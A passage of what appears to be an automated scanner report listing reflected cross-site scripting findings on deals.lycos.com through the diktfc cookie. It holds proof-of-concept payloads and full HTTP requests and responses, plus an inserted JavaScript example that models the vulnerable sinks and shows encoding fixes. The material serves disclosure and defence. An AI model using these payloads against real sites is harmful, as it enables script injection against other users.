COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab302d";alert(1)//2f566655819"
});
</script>
...[SNIP]...

1.305. http://deals.lycos.com/deals/stores/6pm-1460 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/6pm-1460

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5859"%3balert(1)//b6205f25b94 was submitted in the diktfc cookie. This input was echoed as f5859";alert(1)//b6205f25b94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/6pm-1460 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af5859"%3balert(1)//b6205f25b94; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/6pm-1460",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af5859";alert(1)//b6205f25b94"
});
</script>
...[SNIP]...

1.306. http://deals.lycos.com/deals/stores/6pm-1460 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/6pm-1460

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7962"><script>alert(1)</script>516615919cc was submitted in the diktfc cookie. This input was echoed unmodified in the application's response. Note that the static query separators in the same attribute are written as &amp; while the cookie value is not encoded at all: the HTML encoding applied to the literal parts of the URL is not applied to the value interpolated into it.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/6pm-1460 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab7962"><script>alert(1)</script>516615919cc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/6pm-1460&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab7962"><script>alert(1)</script>516615919cc&amp;cj=1" alt="tracker" />
...[SNIP]...
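The following is an added example, not code from Lycos or from the scanner that produced this report. It models the two diktfc sinks reported in 1.304 (a double-quoted JavaScript string literal inside COMSCORE.beacon) and 1.306 (a double-quoted img src attribute), reproduces the reflection check a scanner performs, and shows the context-aware fix for each sink. The server-side template functions are assumptions about how the page is built; only the cookie name, the payloads and the output shapes are taken from the report.

```javascript
// Added example (not Lycos code): the two diktfc sinks from findings 1.304 and
// 1.306, the scanner's reflection check, and a context-aware fix for each.
// The render functions are an assumed model of the site's template.

// Extract one cookie from a raw Cookie request header. PHP's $_COOKIE
// URL-decodes values, which is why the submitted %3b came back as ';'.
function getCookie(cookieHeader, name) {
  for (const part of cookieHeader.split(';')) {
    const eq = part.indexOf('=');
    if (eq === -1) continue;
    if (part.slice(0, eq).trim() !== name) continue;
    const raw = part.slice(eq + 1).trim();
    try { return decodeURIComponent(raw); } catch (e) { return raw; }
  }
  return null;
}

// Sink 1 as reported: the cookie value is dropped into a double-quoted
// JavaScript string literal inside COMSCORE.beacon({...}).
function renderBeaconScriptVulnerable(path, c15) {
  return '<script type="text/javascript">\nCOMSCORE.beacon({\n' +
    'c1:2,\nc2:6036445,\nc3:"",\nc4:"' + path + '",\nc5:"",\nc6:"",\n' +
    'c15:"' + c15 + '"\n});\n</script>';
}

// Sink 2 as reported: the same value inside a double-quoted src attribute.
// The template writes &amp; between parameters, so the static part of the URL
// is HTML-encoded, but the interpolated cookie value is not.
function renderBeaconImgVulnerable(path, c15) {
  return '<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;' +
    'c3=&amp;c4=' + path + '&amp;c5=&amp;c6=&amp;c15=' + c15 +
    '&amp;cj=1" alt="tracker" />';
}

// Encoder for a JavaScript string literal. JSON.stringify escapes quotes and
// backslashes; the extra replacements keep </script>, HTML comment openers
// and the JS line terminators U+2028/U+2029 out of the literal.
function jsStringLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c').replace(/>/g, '\\u003e').replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028').replace(/\u2029/g, '\\u2029');
}

// Encoder for an HTML attribute value.
function htmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Fixed sink 1: every dynamic value is emitted as a JS string literal.
function renderBeaconScriptSafe(path, c15) {
  return '<script type="text/javascript">\nCOMSCORE.beacon({\n' +
    'c1:2,\nc2:6036445,\nc3:"",\nc4:' + jsStringLiteral(path) +
    ',\nc5:"",\nc6:"",\nc15:' + jsStringLiteral(c15) + '\n});\n</script>';
}

// Fixed sink 2: URL-encode each query value, then attribute-encode the whole
// URL when writing it into src. Two contexts, two encodings, in that order.
function renderBeaconImgSafe(path, c15) {
  const url = 'http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=' +
    encodeURIComponent(path) + '&c5=&c6=&c15=' + encodeURIComponent(c15) + '&cj=1';
  return '<img src="' + htmlAttr(url) + '" alt="tracker" />';
}

// The scanner's check, reduced to its essence: the context-breaking part of
// the payload appears verbatim in the response body.
function reflectsUnmodified(responseBody, breakout) {
  return responseBody.includes(breakout);
}

// Pull the c15 literal back out of a rendered script and parse it. Returns
// undefined when the literal is malformed, i.e. when the payload broke out.
function parseC15(script) {
  const m = /c15:(.*)\n\}\);/.exec(script);
  if (!m) return undefined;
  try { return JSON.parse(m[1]); } catch (e) { return undefined; }
}

// Constructed input: the Cookie header from finding 1.306, trimmed, and the
// diktfc payload from finding 1.304 exactly as it was sent (before decoding).
const COOKIE_HEADER =
  'displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; ' +
  'diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab7962"><script>alert(1)</script>516615919cc; ' +
  'LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;';
const PATH = 'deals.lycos.com/deals/stores/6pm-1460';
const JS_PAYLOAD = 'b302d"%3balert(1)//2f566655819';

// Run both sinks, vulnerable and fixed, and report what breaks out.
function demo() {
  const attrValue = getCookie(COOKIE_HEADER, 'diktfc');
  const jsValue = getCookie('diktfc=' + JS_PAYLOAD, 'diktfc');
  return {
    attrVulnerable: reflectsUnmodified(renderBeaconImgVulnerable(PATH, attrValue), '"><script>'),
    attrFixed: reflectsUnmodified(renderBeaconImgSafe(PATH, attrValue), '"><script>'),
    jsVulnerable: parseC15(renderBeaconScriptVulnerable(PATH, jsValue)) === undefined,
    jsFixed: parseC15(renderBeaconScriptSafe(PATH, jsValue)) === jsValue,
  };
}
```

Run with node; demo() returns four booleans: both vulnerable renderers let the payload break out of its quoting, both fixed renderers do not, and the fixed script literal round-trips to the original cookie value. The point of the two encoders is that each sink needs the encoding for its own context: in the attribute the value is first a URL query parameter and then an attribute value, so it is URL-encoded and then HTML-encoded, while in the script it is a JavaScript string and gets a JavaScript literal encoder, never an HTML one. The report shows PHP/5.1.6; the closest built-in equivalents there are json_encode() for the script context and htmlspecialchars() with ENT_QUOTES around a urlencode()'d value for the attribute, noting that the JSON_HEX_TAG and JSON_HEX_AMP flags that give json_encode() the `<`, `>` and `&` escapes used above only arrived in PHP 5.3.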

1.307. http://deals.lycos.com/deals/stores/best-buy-560 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/best-buy-560

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3978b"%3balert(1)//cc36d6b749a was submitted in the diktfc cookie. This input was echoed as 3978b";alert(1)//cc36d6b749a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/best-buy-560 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3978b"%3balert(1)//cc36d6b749a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:38 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/best-buy-560",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3978b";alert(1)//cc36d6b749a"
});
</script>
...[SNIP]...

1.308. http://deals.lycos.com/deals/stores/best-buy-560 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/best-buy-560

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd064"><script>alert(1)</script>f8d80f801a2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/best-buy-560 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd064"><script>alert(1)</script>f8d80f801a2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/best-buy-560&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd064"><script>alert(1)</script>f8d80f801a2&amp;cj=1" alt="tracker" />
...[SNIP]...

1.309. http://deals.lycos.com/deals/stores/buy-com-233 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/buy-com-233

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2630"%3balert(1)//4cb7f0b56a was submitted in the diktfc cookie. This input was echoed as d2630";alert(1)//4cb7f0b56a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/buy-com-233 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad2630"%3balert(1)//4cb7f0b56a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/buy-com-233",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad2630";alert(1)//4cb7f0b56a"
});
</script>
...[SNIP]...

1.310. http://deals.lycos.com/deals/stores/buy-com-233 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/buy-com-233

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f2c"><script>alert(1)</script>8b3b9fa5add was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/buy-com-233 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A94f2c"><script>alert(1)</script>8b3b9fa5add; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/buy-com-233&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A94f2c"><script>alert(1)</script>8b3b9fa5add&amp;cj=1" alt="tracker" />
...[SNIP]...

1.311. http://deals.lycos.com/deals/stores/dell-home-638 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/dell-home-638

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd3f3"><script>alert(1)</script>6d94b7cd86b was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/dell-home-638 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd3f3"><script>alert(1)</script>6d94b7cd86b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:35 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/dell-home-638&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd3f3"><script>alert(1)</script>6d94b7cd86b&amp;cj=1" alt="tracker" />
...[SNIP]...

1.312. http://deals.lycos.com/deals/stores/dell-home-638 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/dell-home-638

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efe09"%3balert(1)//d150acaf4db was submitted in the diktfc cookie. This input was echoed as efe09";alert(1)//d150acaf4db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/dell-home-638 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aefe09"%3balert(1)//d150acaf4db; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/dell-home-638",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aefe09";alert(1)//d150acaf4db"
});
</script>
...[SNIP]...

1.313. http://deals.lycos.com/deals/stores/ebay-50 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/ebay-50

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a88"><script>alert(1)</script>0fb01bfaa85 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/ebay-50 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55a88"><script>alert(1)</script>0fb01bfaa85; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/ebay-50&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55a88"><script>alert(1)</script>0fb01bfaa85&amp;cj=1" alt="tracker" />
...[SNIP]...

1.314. http://deals.lycos.com/deals/stores/ebay-50 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/ebay-50

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 317e4"%3balert(1)//c8dbb3e8531 was submitted in the diktfc cookie. This input was echoed as 317e4";alert(1)//c8dbb3e8531 in the application's response.

